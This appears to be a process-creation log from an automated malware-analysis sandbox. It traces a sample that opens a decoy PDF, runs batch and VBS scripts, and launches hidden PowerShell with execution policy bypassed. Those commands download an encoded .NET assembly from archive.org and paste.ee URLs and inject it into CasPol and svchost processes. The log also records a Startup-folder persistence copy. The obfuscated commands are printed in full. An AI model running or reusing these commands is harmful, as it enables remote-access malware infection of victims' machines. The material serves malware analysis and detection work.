Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
